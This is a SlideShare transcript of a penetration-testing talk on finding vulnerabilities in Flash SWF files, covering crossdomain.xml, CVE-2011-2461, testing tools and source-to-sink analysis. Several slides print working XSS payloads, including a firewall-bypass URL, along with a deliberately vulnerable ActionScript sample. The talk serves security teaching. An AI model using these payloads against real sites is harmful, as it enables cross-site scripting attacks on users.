SlideShare a Scribd company logo

Flash it baby!

Download as PPTX, PDF
Soroush Dalili, profile picture
Soroush Dalili

This document discusses finding vulnerabilities in SWF (Flash) files. It begins with an introduction to embedding SWF files in HTML and ActionScript versions. It then covers strategies for finding SWF files on websites, as well as types of issues like XSS, data hijacking, and information disclosure. The document provides details on tools for automated and manual testing of SWF files, such as decompiling files, identifying input parameters and sinks, and techniques for bypassing protections.

Internet
Related topics:
Penetration-Testing
1 of 41
Downloaded 50 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Flash it baby! Finding vulnerabilities in SWF files (v2.0)
whoami ♦ Security consultant at NCCGroup ♦ +10 years in web application security ♦ Researcher and bug hunter (I am trying to be?!) ♦ @irsdl ♦ https://soroush.secproject.com/blog/ © NCC Group 2
Flash Isn’t Quite DeadYet! ♦ They ignore it, they laugh at it, but they have to fight it! ♦ They may not use it, but probably have it! ♦ SWF in JS libraries, HTMLWYSIWYG editors, Players in CMSes, … ♦ XSS is XSS no matter where it is! © NCC Group 3
What’s on the MenuToday? ♦ Assumptions:  Client-side web application issues  SWF files in browsers via a website (not local with file system nor AIR apps) ♦ Excluded:  Making a website vulnerable by uploading a Flash file  Exploiting a website by creating a reflected Flash file (e.g. Rosetta Flash)  Attacking server-side  Nudity!!! © NCC Group 4
Introduction ♦ ActionScript is based on ECMAScript 😍 ♦ .SWF -> A compiled Flash file (binary) ->We care about this ❤ ♦ Versions: 1 and 2 ;then 3 to supports object oriented designs 💞 © NCC Group 5
Embedding into a HTML Page ♦ Embedded via OBJECT or EMBED tags  Example with OBJECT:  Example with EMBED: ♦ “OBJECT” can accept “allowScriptAccess” as attribute -> Not IE ♦ Use “TYPE” when content-type is different ♦ “classid”, “codetype” -> obsoleted since HTML5 ♦ “allowScriptAccess=always” to communicate with HTML! ♦ “allowScriptAccess=samedomain” is default! © NCC Group 6 <object type="application/x-shockwave-flash" data="file.swf"> <param name="movie" value="file.swf" /> <param name="FlashVars" value="param1=value1&p2=v2" /> <param name="allowscriptaccess" value="always" /> </object> <embed src="file.swf" type="application/x-shockwave-flash" allowScriptAccess="always" FlashVars="param1=value1&p2=v2">
Bug Hunting Strategy ♦ Finding Flash Files  Google… filetype:swf site:example.com  Download open source apps/libs  Search in contents for SWF  Search similar open source projects for SWF ♦ Search for known issues ♦ Automated testing ♦ Manual testing ♦ Note: Is it eligible in bug bounty?  e.g.: https://hackerone.com/yahoo © NCC Group 7
WhatType of Issues? ♦ Insecure crossdomain.xml ♦ CVE-2011-2461 – still Alive! ♦ Vulnerabilities in SWF Files  Cross-site scripting (XSS)  Cross-site data hijacking (XSDH?)  Same Origin Method Execution (SOME)  Open redirections (doesn’t have a fancy name!)  Information disclosure - credentials, hidden URLs, etc.  Spoofing/Defacement via loading remote objects  Storing sensitive data on the client-side  Log forging (not really important most of the times) © NCC Group 8
Insecure crossdomain.xml ♦ Least restrictive policy: ♦ “crossdomain.xml” instead of “clientaccesspolicy.xml” for Silverlight:  The most secure one is insecure! © NCC Group 9 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross- domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all"/> <allow-access-from domain="*" secure="false"/> <allow-http-request-headers-from domain="*" headers="*" secure="false"/> </cross-domain-policy> <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross- domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" headers="SOAPAction" secure="true"> </cross-domain-policy>
Content Hijacking PoCTool ♦ Cross-Site Content Hijacking (XSCH) PoC:  https://github.com/nccgroup/CrossSiteContentHijacking  E.g.: https://query.yahooapis.com/crossdomain.xml © NCC Group 10
CVE-2011-2461 -The Dead is Alive! ♦ Flex SDK issue (between 3.x and 4.5.1) ♦ A new input to load external SWF files ♦ Attacks:  Same-Origin Request Forgery  Cross-Site Content Hijacking ♦ Found by Mauro Gentile (@sneak_) & Luca Carettoni © NCC Group 11
Finding CVE-2011-2461 ♦ ParrotNG to the rescue!  with Burp Suite extension (passive scan)!  Make sure it is working properly -> Important ;-)  Only scan .swf extensions!  Can search a folder ♦ Decompile & Search:  In “mx.modules.ModuleManager”  Patched version may have “&& false == true” ♦ Cross-SiteContent Hijacking (XSCH) PoC :  https://github.com/nccgroup/CrossSiteContentHijacking © NCC Group 12 Security.sandboxType == Security.REMOTE)
CVE-2011-2461 Exploitation PoC ♦ “wonderwheel7.swf” was hosted on Google.com originally ♦ ParrotNG detected the issue: ♦ e.g: Hijacking contents from “0me.me” by “15.rs”:  https://15.rs/ContentHijacking/ContentHijackingLoader.html?objfile=https://0me. me/demo/cve-2011-2461/wonderwheel7.swf&objtype=cve-2011- 2461&target=https://0me.me/secret.txt&logmode=result&isauto=1 © NCC Group 13
Important: Do Not Reinvent theWheel! ♦ Search for known vulnerabilities  e.g.: https://web.archive.org/web/20130730223443/http://web.appsec.ws/FlashExploit Database.php ♦ Search their issue tracker for security issues ♦ Old exploits may still be valid with a few changes! © NCC Group 14
AutomatedTesting Listed in OWASP Flash Security Project: ♦ FlashDiggity  Decompile -> Search using RegEx  Extractable Rules: http://www.bishopfox.com/dictionaries/Flash%20Regexes.txt  Had problems with AS3 during test ♦ HP SWFScan (Part of HP WebInspect)  DecompileAS2 & 3 -> Search using RegEx  Has module exclusion rules  Stand-alone is old otherwise commercial ♦ HP Fortify  Scan AS3, Flex3 & 4 using source code (not SWF)  Commercial © NCC Group 15
Updated SWFIntruder + ♦ Updated SWFIntruder:  Dirty fix for the original SWFIntruder  Uses several payloads for each input parameter  Can detect most of AS2 FlashVars  FlashVars should be declared for AS3  Good to find XSS without user interaction  Runs in a browser – can be slow  Can be extended by you! https://github.com/irsdl/updated-SWFIntruder ♦ FlashBang  Runs in a browser  Based on Mozilla's Shumway  Easy way to identify FlashVars (just has some bugs!)  https://github.com/cure53/flashbang © NCC Group 16
Try it on! Homework! ♦ http://0me.me/swfintruder/testSWF/  http://0me.me/swfintruder/testSWF/clickTagSample.swf  http://0me.me/swfintruder/testSWF/fileuploader.swf  http://0me.me/swfintruder/testSWF/Vulnerable.swf © NCC Group 17
ManualTesting ♦ Preparing testing environment ♦ CompilingActionScript files ♦ Decompiling SWF files ♦ Finding inputs (sources) ♦ Finding usage of dangerous functions (sinks) ♦ Reviewing the logic, finding sensitive strings, reversing, etc. © NCC Group 18
Preparing the Environment (Windows) ♦ Download the Flash debugger version:  https://www.adobe.com/support/flashplayer/downloads.html Windows: ♦ Modify the “mm.cfg” file in %userprofile%  e.g. c:usersmyusermm.cfg  Default log file location inWindows (policy file is there too): © NCC Group 19 ErrorReportingEnable=1 TraceOutputFileEnable=1 MaxWarnings=50 PolicyFileLog=1 PolicyFileLogAppend=1 # AS3Trace=1 # To see more! %userprofile%AppDataRoamingMacromediaFlash PlayerLogsflashlog.txt
Compiling HelloXSSWorld.as ♦ Free recommended IDEs:  FDT (similar to Eclipse) (preferred for simpler projects)  FlashDevelop (includes a powerful runtime debugger) ♦ + Flex SDK and Java ♦ Code sample (vulnerable to open redirect and XSS): © NCC Group 20 package { import flash.net.navigateToURL; import flash.net.URLRequest; import flash.display.Sprite; public class HelloFlashWorld extends Sprite { // User input: HelloFlashWorld.swf?target=foo private var url : String = root.loaderInfo.parameters.target; public function HelloFlashWorld() { var request : URLRequest = new URLRequest(url); try { // redirect to the target URL navigateToURL(request); } catch (e : Error) { // handle error here } } } }
Decompiling a SWF File ♦ Recommended decompiler: JPEXS Free Flash Decompiler  Easy to use UI  Can edit SWF files  Occasional updates  Another Java based tool! can be slow and it might crash but still good! https://www.free-decompiler.com/flash/ https://github.com/jindrapetrik/jpexs-decompiler © NCC Group 21
Decompiled, NowWhat? ♦ AS1/2 or AS3?  http://dev.sitedaniel.com/swfinfo/swfinfo.swf - added to Updated SWF Intruder ♦ Find input parameters (sources)  Find their usage ♦ Find interesting/sensitive functions (sinks)  Check their inputs ♦ Identify insecure policies  Any interesting behaviour? ♦ Identify sensitive data or hidden URLs  Can lead to server-side issues (more serious issues) ♦ Identify storage and logging issues  Cookies and logs © NCC Group 22
Input Parameters - Sources ♦ Finding a “source”:  Look at the HTML page (DOM viewer)  Find similar inputs based on a known input parameter  AS3 (Variables need to be defined):  Search for: “root”, “loaderInfo”, “parameters”  e.g.: root.loaderInfo.parameters.inputName  AS2 (Variables can be undefined):  Search for: “_root”, “_global”, “_level0”  Any undefined variable! Use Flash debugger log file! © NCC Group 23 .(root|loaderInfo|parameters)[^w]|[^w](root|loaderInfo|parameters). .(_root|_global|_level0)[^w]|[^w](_root|_global|_level0). Warning: Reference to undeclared variable, 'inputName'
Sinks ♦ Sinks - find usage of sensitive functions  Can run JavaScript:  AS3: “ExternalInterface.call”, “navigateToURL”  AS2: “getURL”, “fscommand”  “.htmlText”  Can load objects, or send/receive/store data:  “XMLLoader”, “AMFService”, “SWFLoader”, “loadVariables”, “loadMovie”, “loadMovieNum”, “LoadVars.load”, “LoadVars.send”, “NetStream.play”, “getDefinition”, “getDefinition”, “FScrollPane.loadScrollContent”, “XML.load”, “Sound.loadSound”, “NetStream.play”, “URLRequest”, “URLLoader”, “URLStream”, “LocalConnection”, “SharedObject”  Can run Flash functions from JavaScript:  “ExternalInterface.addCallback” (AS3), “.watch” (AS2)  Important with insecure “Security.allowDomain” ♦ No sensitive function = Less likely to find a good vulnerability © NCC Group 24
Source <-> Sink Flow! ♦ Tainted source --> … --> sink! ♦ Sink <-- … <--Tainted source! ♦ Any validation?  What is allowed?  Is it good enough? ♦ Any logic?  Some inputs should be set for something to happen?  Role of any provided external file/URL © NCC Group 25
Insecure Policies in SWF Files ♦ Search for “allowDomain” and “allowInsecureDomain” ♦ Security.allowDomain: Cross-domain communication  SWF can be scripted by another SWF file on another domain  HTML (JavaScript) from another domain can communicate with SWF ♦ Security.allowInsecureDomain: HTTP to HTTPS communication  HTTPS communication to HTTP is fine ♦ LocalConnection’s Security.allowDomain  SWF/AIR can communicate with another SWF/AIR Not an issue if there is no interesting functionality! © NCC Group 26
Sensitive Data / Hidden URLs / Gems! ♦ Think like a forensic analyst! Search for:  URLs  Emails  Secret keys and passwords  Database information  Etc. ♦ FlashDiggity rules are good:  http://www.bishopfox.com/dictionaries/Flash%20Regexes.txt © NCC Group 27
Sensitive Data in Storage! ♦ “SharedObjects” for Flash Cookies!  Can even store binary ♦ “trace” function for logging in debug mode.  Can make the debugging easier  Sensitive data in log files when debugger version is used © NCC Group 28
Find More! Be creative! ♦ Always look at the FlashVars parameter names  Anything called “onload”, “onclick”, or “redirect”? ♦ Does it load another file when you open it? Find it, abuse it! ♦ Does it accept external configuration files?  Find a valid config file and manipulate it  Example: XSS issue in FlowPlayer: https://github.com/flowplayer/flash/issues/263 © NCC Group 29
“ExternalInterface.call” XSS Confusion! ♦ Accept JS function name and its parameters ♦ Both can lead to XSS ♦ The first parameter can be a simple JavaScript code (name of JS function) ♦ The next parameter (argument) is escaped:  " turns into "  all good!  doesn't turn into  too bad! So " can be used to run a JS code. e.g. "))-alert('XSS')}catch(e){}// See http://mihai.bazon.net/blog/externalinterface-is-unreliable ♦ Debuggable using browsers’ console – cause an error:  xxx"'(){}"'(){}'"(){}xxx © NCC Group 30
Bypassing Client Side Protections ♦ Protections on the client side only make it more user friendly  Not good for security! ♦ Find the responsible function in the source code  Understand how it works, find the credentials, and bypass it!  Change the code and save it to bypass the protections © NCC Group 31
More Issues… ♦ Identify and review the sensitive functions  Such as login or encryption functions ♦ Flash files can contain unused/commented server side code and information ♦ Identify requests that it sends to the server  Can lead to finding broken access controls on the server side ♦ Examples:  Testing an online game?  Can you go to the next level without playing?  Does it use encryption?  Are there any keys stored in the application? © NCC Group 32
FlashVarsTips! ♦ Passing parameters in URL:  File.swf?param1=value1&p2=v2 ♦ Removes invalid encoding  param1=value1 -> pa%Xram1=val%Yue1  param1=value1 -> pa%=ram1=val%#ue1  param1=value1 -> pa%AXram1=val%B#ue1 ♦ Sending parameters after “#” is dead? Nope!  File.swf?%#param1=value1&p2=v2 ♦ In redirection, %7f-%FF converts to “?” ♦ BOM (byte-order-mark) “%EF%BB%BF” = a SPACE char! ♦ Flash in Firefox may not like %00 © NCC Group 33
Examples ♦ Bypassing firewalls – was detecting “domid=”:  https://example.com/foobar/ScrollLine2D.swf?%#domid=%22))}catch(e){};a lert(%27External%20Interface%20XSS%20from:%20%27%2bdocument.do main)//&registerwithjs=1 ♦ Bypassing an in-app protection – didn’t like inputs from GET:  /flashmediaelement.swf?jsinitfunctio%gn=alert`1` © NCC Group 34 pos = root.loaderInfo.url.indexOf('?'); if (pos !== -1) { query = parseStr(root.loaderInfo.url.substr(pos + 1)); for (var key:String in params) { if (query.hasOwnProperty(trim(key))) { delete params[key]; } } }
Demo – FindingVulnerabilities! ♦ clickTagSample.swf  ActionScript2 ♦ vulnerable.swf  ActionSctipt2 ♦ Homework: ♦ fileuploader.swf  ActionScript3 ♦ Answer (in white colour): ?flashButton=:"))-alert('XSS')}catch(e){}//; ♦ You are ready with more practice! © NCC Group 35
Used RegExes in Demo AS3 Inputs: .(root|loaderInfo|parameters)[^w]|[^w](root|loaderInfo|parameters). AS2 Inputs (remember undefined inputs – follow the sinks): .(_root|_global|_level0)[^w]|[^w](_root|_global|_level0). XSS: (getURL|ExternalInterface.call|navigateToURL|.htmlText) Sensitive functions: (XMLLoader|AMFService|SWFLoader|loadVariables|loadMovie|loadMovieNum|Loa dVars.load|LoadVars.send|NetStream.play|getDefinition|getDefinition|FScrollPa ne.loadScrollContent|XML.load|Sound.loadSound|NetStream.play|URLRequest| URLLoader|URLStream|LocalConnection|SharedObject) Interesting keywords: (allowInsecureDomain|allowDomain|ExternalInterface|load|xml|sql|url|flashvar|pa ss|TextField|encr) © NCC Group 36
Final Notes ♦ Search in your proxy logs for “SWF” files! ♦ JS libraries and plugins can contain Flash files ♦ Can be slow – don’t panic! Plan ahead! ♦ Review the API references for any security-related functions:  AS2: http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/2/  AS3: http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/ ♦ The following resource is also recommended for code review:  http://www.hpenterprisesecurity.com/vulncat/en/vulncat/index.html ♦ Flash files can send requests to their server during testing! ♦ Downloading random Flash files is dangerous but fun  We all know why! © NCC Group 37
Thank you! Questions? Really?Why?! ;) ♦ Sample files in: https://github.com/irsdl/Flash-Files-Vulnerability-Database © NCC Group 38
References & Further Reading - 1 ♦ Securely deploying cross-domain policy files  http://blogs.adobe.com/security/2009/11/securely_deploying_cross-domai.html ♦ Related to Flash policy file  http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for- streaming.html ♦ Security Domains,Application Domains, and More in ActionScript 3.0  http://www.senocular.com/flash/tutorials/contentdomains/ ♦ Penetration testers guide  http://www.ivizsecurity.com/blog/web-application-security/testing-flash-applications-pen- tester-guide/ ♦ ExploitingCVE-2011-2461 on google.com  http://blog.mindedsecurity.com/2015/03/exploiting-cve-2011-2461-on-googlecom.html ♦ AS3 hidden treasure in the mm.cfg file  https://jpauclair.net/2010/02/10/mmcfg-treasure/ © NCC Group 39
References & Further Reading - 2 ♦ ParrotNG project to find CVE-2011-2461 vulnerable files  https://github.com/ikkisoft/ParrotNG ♦ Testing for Cross site flashing  https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OTG-CLIENT-008) ♦ Blinded by Flash:Widespread Security Risks Flash Developers Don’t See  https://www.blackhat.com/presentations/bh-dc-09/Jagdale/BlackHat-DC-09-Jagdale- Blinded-by-Flash.pdf ♦ SWF INFO :WIDTH, HEIGHT, SWFVERSION,ACTIONSCRIPTVERSION, FRAMERATE  http://blog.sitedaniel.com/2009/11/swf-info-width-height-swf-version-actionscript-version- framerate/ ♦ Creating more secure SWF web applications  http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html ♦ OWASP Flash Security Project  https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project © NCC Group 40
References & Further Reading - 3 ♦ Same Origin Method Execution (SOME)  http://www.benhayak.com/2015/06/same-origin-method-execution-some.html ♦ WordPress SOME bug in plupload.flash.swf  https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e ♦ Catch-up on Flash XSS exploitation  https://soroush.secproject.com/blog/2013/10/catch-up-on-flash-xss-exploitation-bypassing- the-guardians-part-1/  https://soroush.secproject.com/blog/2013/10/catch-up-on-flash-xss-exploitation-part-2- navigatetourl-and-jar-protocol/  https://soroush.secproject.com/blog/2014/01/catch-up-on-flash-xss-exploitation-part-3-xss- by-embedding-a-flash-file/ © NCC Group 41

More Related Content

PPTX
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
lokeshpidawekar
 
PDF
Ruxmon feb 2013 what happened to rails
snyff
 
PDF
Entomology 101
snyff
 
PDF
Pwning mobile apps without root or jailbreak
Abraham Aranguren
 
PDF
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
PDF
Silent web app testing by example - BerlinSides 2011
Abraham Aranguren
 
PDF
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
PDF
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
Abraham Aranguren
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
lokeshpidawekar
 
Ruxmon feb 2013 what happened to rails
snyff
 
Entomology 101
snyff
 
Pwning mobile apps without root or jailbreak
Abraham Aranguren
 
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
Silent web app testing by example - BerlinSides 2011
Abraham Aranguren
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
Abraham Aranguren
 

What's hot (20)

PDF
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
PPTX
Client-side JavaScript Vulnerabilities
Ory Segal
 
PDF
DevOops & How I hacked you DevopsDays DC June 2015
Chris Gates
 
PDF
Ruxmon cve 2012-2661
snyff
 
PDF
Defcon CTF quals
snyff
 
PPTX
Javascript Security - Three main methods of defending your MEAN stack
Ran Bar-Zik
 
PPTX
Vulnerabilities in data processing levels
beched
 
PDF
Lie to Me: Bypassing Modern Web Application Firewalls
Ivan Novikov
 
PDF
Racing The Web - Hackfest 2016
Aaron Hnatiw
 
PPTX
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Chris Gates
 
PDF
Ln monitoring repositories
snyff
 
PDF
Defending Against Application DoS attacks
Roberto Suggi Liverani
 
PDF
Finding Needles in Haystacks
snyff
 
PDF
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
PPTX
Adventures in Asymmetric Warfare
Will Schroeder
 
PDF
Legal and efficient web app testing without permission
Abraham Aranguren
 
PDF
Owasp tds
snyff
 
PPTX
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates
 
PDF
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Krzysztof Kotowicz
 
PDF
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Abraham Aranguren
 
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
Client-side JavaScript Vulnerabilities
Ory Segal
 
DevOops & How I hacked you DevopsDays DC June 2015
Chris Gates
 
Ruxmon cve 2012-2661
snyff
 
Defcon CTF quals
snyff
 
Javascript Security - Three main methods of defending your MEAN stack
Ran Bar-Zik
 
Vulnerabilities in data processing levels
beched
 
Lie to Me: Bypassing Modern Web Application Firewalls
Ivan Novikov
 
Racing The Web - Hackfest 2016
Aaron Hnatiw
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Chris Gates
 
Ln monitoring repositories
snyff
 
Defending Against Application DoS attacks
Roberto Suggi Liverani
 
Finding Needles in Haystacks
snyff
 
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
Adventures in Asymmetric Warfare
Will Schroeder
 
Legal and efficient web app testing without permission
Abraham Aranguren
 
Owasp tds
snyff
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Krzysztof Kotowicz
 
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Abraham Aranguren
 
Ad

Similar to Flash it baby! (20)

PPTX
Java Web Security Class
Rich Helton
 
PPT
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
guestb0af15
 
PDF
OSCP Preparation Guide @ Infosectrain
InfosecTrain
 
PDF
Flashack
n|u - The Open Security Community
 
PPTX
CodeIgniter i18n Security Flaw
Abbas Naderi
 
PDF
Something wicked this way comes - CONFidence
Krzysztof Kotowicz
 
PDF
Be ef presentation-securitybyte2011-michele_orru
Michele Orru
 
PPSX
Attacking HTML5
AppSec_Labs
 
PDF
Krzysztof kotowicz. something wicked this way comes
Yury Chemerkin
 
PDF
2017-07-22 Common Workflow Language Viewer
Stian Soiland-Reyes
 
PPTX
Anatomy of a Drupal Hack - TechKnowFile 2014
University of Toronto Libraries - Information Technology Services
 
PDF
Appenginejs (old presentation)
Panagiotis Astithas
 
PPT
Same Origin Policy Weaknesses
kuza55
 
PPTX
OWASP Poland Day 2018 - Andrzej Dyjak - Zero Trust Theorem
OWASP
 
PPTX
An introduction to php shells
RichieSM
 
PDF
Problems with parameters b sides-msp
Mike Saunders
 
KEY
HTML5와 모바일
ACCESS
 
PDF
Attack Chaining: Advanced Maneuvers for Hack Fu
Rob Ragan
 
PPTX
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
PROIDEA
 
PPT
Hacking The World With Flash
joepangus
 
Java Web Security Class
Rich Helton
 
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
guestb0af15
 
OSCP Preparation Guide @ Infosectrain
InfosecTrain
 
Flashack
n|u - The Open Security Community
 
CodeIgniter i18n Security Flaw
Abbas Naderi
 
Something wicked this way comes - CONFidence
Krzysztof Kotowicz
 
Be ef presentation-securitybyte2011-michele_orru
Michele Orru
 
Attacking HTML5
AppSec_Labs
 
Krzysztof kotowicz. something wicked this way comes
Yury Chemerkin
 
2017-07-22 Common Workflow Language Viewer
Stian Soiland-Reyes
 
Anatomy of a Drupal Hack - TechKnowFile 2014
University of Toronto Libraries - Information Technology Services
 
Appenginejs (old presentation)
Panagiotis Astithas
 
Same Origin Policy Weaknesses
kuza55
 
OWASP Poland Day 2018 - Andrzej Dyjak - Zero Trust Theorem
OWASP
 
An introduction to php shells
RichieSM
 
Problems with parameters b sides-msp
Mike Saunders
 
HTML5와 모바일
ACCESS
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Rob Ragan
 
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
PROIDEA
 
Hacking The World With Flash
joepangus
 
Ad

Recently uploaded (20)

PDF
Best Practices for Testing and Debugging Shopify Third-Party API Integrations...
CartCoders
 
PPTX
innovation process that make everything different.pptx
SoumyadipPaul18
 
PPTX
INTERNET------BASICS-------UPDATED PPT PRESENTATION
poonam62133
 
PDF
RPKI Status Update, presented by Makito Lay at IDNOG 10
APNIC
 
PDF
Paper PDF World Game (s) Great Redesign.pdf
Steven McGee
 
DOCX
Unit-3 cyber security network security of internet system
shivangisharma636228
 
PPTX
Introduction about ICD -10 and ICD11 on 5.8.25.pptx
naveenithkrishnan
 
PPTX
Digital Literacy And Online Safety on internet
riksa rifqi
 
PDF
An introduction to the IFRS (ISSB) Stndards.pdf
farhankhan13694
 
PPTX
Introduction to Information and Communication Technology
AkmadArzieAyao1
 
PPTX
Internet___Basics___Styled_ presentation
poonam62133
 
PDF
APNIC Update, presented at PHNOG 2025 by Shane Hermoso
APNIC
 
PPTX
Slides PPTX World Game (s) Eco Economic Epochs.pptx
Steven McGee
 
PPTX
Job_Card_System_Styled_lorem_ipsum_.pptx
Jeffkigen
 
PDF
How to Ensure Data Integrity During Shopify Migration_ Best Practices for Sec...
CartCoders
 
PPTX
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
KuyaRogie
 
PPTX
E -tech empowerment technologies PowerPoint
kylebalatero12
 
PPTX
Introuction about ICD -10 and ICD-11 PPT.pptx
naveenithkrishnan
 
PDF
FINAL CALL-6th International Conference on Networks & IOT (NeTIOT 2025)
IJMIT JOURNAL
 
PDF
The New Creative Director: How AI Tools for Social Media Content Creation Are...
SageTitans
 
Best Practices for Testing and Debugging Shopify Third-Party API Integrations...
CartCoders
 
innovation process that make everything different.pptx
SoumyadipPaul18
 
INTERNET------BASICS-------UPDATED PPT PRESENTATION
poonam62133
 
RPKI Status Update, presented by Makito Lay at IDNOG 10
APNIC
 
Paper PDF World Game (s) Great Redesign.pdf
Steven McGee
 
Unit-3 cyber security network security of internet system
shivangisharma636228
 
Introduction about ICD -10 and ICD11 on 5.8.25.pptx
naveenithkrishnan
 
Digital Literacy And Online Safety on internet
riksa rifqi
 
An introduction to the IFRS (ISSB) Stndards.pdf
farhankhan13694
 
Introduction to Information and Communication Technology
AkmadArzieAyao1
 
Internet___Basics___Styled_ presentation
poonam62133
 
APNIC Update, presented at PHNOG 2025 by Shane Hermoso
APNIC
 
Slides PPTX World Game (s) Eco Economic Epochs.pptx
Steven McGee
 
Job_Card_System_Styled_lorem_ipsum_.pptx
Jeffkigen
 
How to Ensure Data Integrity During Shopify Migration_ Best Practices for Sec...
CartCoders
 
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
KuyaRogie
 
E -tech empowerment technologies PowerPoint
kylebalatero12
 
Introuction about ICD -10 and ICD-11 PPT.pptx
naveenithkrishnan
 
FINAL CALL-6th International Conference on Networks & IOT (NeTIOT 2025)
IJMIT JOURNAL
 
The New Creative Director: How AI Tools for Social Media Content Creation Are...
SageTitans
 

Flash it baby!

  • 1. Flash it baby! Finding vulnerabilities in SWF files (v2.0)
  • 2. whoami ♦ Security consultant at NCCGroup ♦ +10 years in web application security ♦ Researcher and bug hunter (I am trying to be?!) ♦ @irsdl ♦ https://soroush.secproject.com/blog/ © NCC Group 2
  • 3. Flash Isn’t Quite DeadYet! ♦ They ignore it, they laugh at it, but they have to fight it! ♦ They may not use it, but probably have it! ♦ SWF in JS libraries, HTMLWYSIWYG editors, Players in CMSes, … ♦ XSS is XSS no matter where it is! © NCC Group 3
  • 4. What’s on the MenuToday? ♦ Assumptions:  Client-side web application issues  SWF files in browsers via a website (not local with file system nor AIR apps) ♦ Excluded:  Making a website vulnerable by uploading a Flash file  Exploiting a website by creating a reflected Flash file (e.g. Rosetta Flash)  Attacking server-side  Nudity!!! © NCC Group 4
  • 5. Introduction ♦ ActionScript is based on ECMAScript 😍 ♦ .SWF -> A compiled Flash file (binary) ->We care about this ❤ ♦ Versions: 1 and 2 ;then 3 to supports object oriented designs 💞 © NCC Group 5
  • 6. Embedding into a HTML Page ♦ Embedded via OBJECT or EMBED tags  Example with OBJECT:  Example with EMBED: ♦ “OBJECT” can accept “allowScriptAccess” as attribute -> Not IE ♦ Use “TYPE” when content-type is different ♦ “classid”, “codetype” -> obsoleted since HTML5 ♦ “allowScriptAccess=always” to communicate with HTML! ♦ “allowScriptAccess=samedomain” is default! © NCC Group 6 <object type="application/x-shockwave-flash" data="file.swf"> <param name="movie" value="file.swf" /> <param name="FlashVars" value="param1=value1&p2=v2" /> <param name="allowscriptaccess" value="always" /> </object> <embed src="file.swf" type="application/x-shockwave-flash" allowScriptAccess="always" FlashVars="param1=value1&p2=v2">
  • 7. Bug Hunting Strategy ♦ Finding Flash Files  Google… filetype:swf site:example.com  Download open source apps/libs  Search in contents for SWF  Search similar open source projects for SWF ♦ Search for known issues ♦ Automated testing ♦ Manual testing ♦ Note: Is it eligible in bug bounty?  e.g.: https://hackerone.com/yahoo © NCC Group 7
  • 8. WhatType of Issues? ♦ Insecure crossdomain.xml ♦ CVE-2011-2461 – still Alive! ♦ Vulnerabilities in SWF Files  Cross-site scripting (XSS)  Cross-site data hijacking (XSDH?)  Same Origin Method Execution (SOME)  Open redirections (doesn’t have a fancy name!)  Information disclosure - credentials, hidden URLs, etc.  Spoofing/Defacement via loading remote objects  Storing sensitive data on the client-side  Log forging (not really important most of the times) © NCC Group 8
